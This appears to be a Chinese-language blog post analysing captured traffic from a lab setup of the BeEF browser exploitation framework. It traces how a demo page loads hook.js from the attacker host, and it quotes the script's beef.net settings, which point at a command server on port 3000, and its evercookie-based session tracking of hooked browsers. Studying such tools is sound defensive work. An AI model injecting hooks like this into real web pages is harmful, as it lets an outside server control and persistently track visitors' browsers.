搭建完了beef就想简答的抓下包分析下
这是第一个包,追踪它
返回demo页面,并发现其中的脚本
window.location.protocol表示协议http, window.location.host代表主机加端口号,红线的意思是调用http://主机:3000/hook.js
继续跟踪数据流,发现浏览器get请求了hook.js
继续跟踪数据流
返回hook.js
内容挺多的。。。看不懂
接着跟踪数据包,发现请求了提交了参数
到hook.js 里搜索dh,找到他的功能
/*!
* @literal object: beef.net
*
* Provides basic networking functions, 提供基础的网络功能
* like beef.net.request and beef.net.forgeRequest, 像beef.net.request和beef.net.forgetRequest
* used by BeEF command modules and the Requester extension, 被beef命令模块和扩展请求使用
* as well as beef.net.send which is used to return commands 返回命令
* to BeEF server-side components. beef的服务器端组件
*
* Also, it contains the core methods used by the XHR-polling
* mechanism (flush, queue)
*/
beef.net = {
host: "192.168.170.132",
port: "3000",
hook: "/hook.js",
httpproto: "http",
handler: '/dh',
chop: 500,
pad: 30, //this is the amount of padding for extra params such as pc, pid and sid
sid\_count: 0,
cmd\_queue: \[\],
继续跟踪,
在hook.js 里搜索BEEFHOOK
/*!
* @literal object: beef.session
*
* Provides basic session functions. 提供基础的session功能
*/
beef.session = {
hook\_session\_id\_length: 80,
hook\_session\_id\_chars: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789",
ec: new evercookie(),
beefhook: "BEEFHOOK",
/\*\*
\* Gets a string which will be used to identify the hooked browser session
\*
\* @example: var hook\_session\_id = beef.session.get\_hook\_session\_id();
\*/
get\_hook\_session\_id: function() {
// check if the browser is already known to the framework
var id = this.ec.evercookie\_cookie(beef.session.beefhook);
if (typeof id == 'undefined') {
var id = this.ec.evercookie\_userdata(beef.session.beefhook);
}
if (typeof id == 'undefined') {
var id = this.ec.evercookie\_window(beef.session.beefhook);
}
// if the browser is not known create a hook session id and set it
if ((typeof id == 'undefined') || (id == null)) {
id = this.gen\_hook\_session\_id();
this.set\_hook\_session\_id(id);
}
// return the hooked browser session identifier
return id;
},
之后的包就是在不断请求重复后两个
随便玩一个功能
效果:
查看数据包
在某次请求hook.js后发生变化
相应的包
可以看到我填写的攻击参数
手机扫一扫
移动阅读更方便
你可能感兴趣的文章